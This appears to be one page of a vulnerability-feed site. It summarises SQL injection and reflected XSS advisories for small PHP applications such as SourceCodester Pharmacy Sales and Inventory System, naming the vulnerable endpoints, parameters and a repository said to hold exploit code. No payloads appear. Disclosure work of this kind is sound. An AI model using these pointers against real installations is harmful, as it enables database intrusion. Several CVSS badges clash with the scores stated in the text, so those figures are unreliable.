MEDIUM This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /ajax.php?action=delete_category, enabling arbitrary SQL query execution with confidentiality and integrity impact. CVSS 6.9 reflects network accessibility and low privilege requirements; publicly available exploit code exists per description.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Reflected cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote attackers to inject malicious scripts via the ID parameter in /index.php?page=categories. The vulnerability requires user interaction (clicking a crafted link) but has publicly available exploit code and a low CVSS score (5.3) reflecting limited impact scope, with only low integrity consequences to the victim's session or data.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /ajax.php?action=save_type, enabling arbitrary SQL query execution with confidentiality and integrity impact. Publicly disclosed exploit code is available, significantly increasing real-world risk despite the moderate CVSS score of 6.9.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

A vulnerability has been found in code-projects Online Lot Reservation System up to 1.0. The impacted element is an unknown function of the file /loginuser.php. The manipulation of the argument email/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to read, modify, or delete database records via the ID parameter in /ajax.php?action=delete_receiving. Publicly available exploit code (GitHub POC) demonstrates working attack against default installations with no authentication required (CVSS AV:N/AC:L/PR:N). EPSS data not available, but POC publication significantly lowers exploitation barrier for opportunistic attacks against internet-exposed instances.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in /ajax.php?action=save_category. Public exploit code exists on GitHub (y1shiny1shin/vuldb-project), enabling immediate weaponization against unpatched systems. CVSS 7.3 reflects potential for confidentiality, integrity, and availability compromise through database manipulation. No remediation release identified at time of analysis.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in code-projects Employee Management System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the id or token parameter in 370project/cancel.php, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has a publicly available proof-of-concept and CVSS score of 6.3 (medium severity) with low attack complexity, though exploitation requires valid user credentials.

PHP SQLi
NVD VulDB GitHub
Prev Page 18 of 275 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy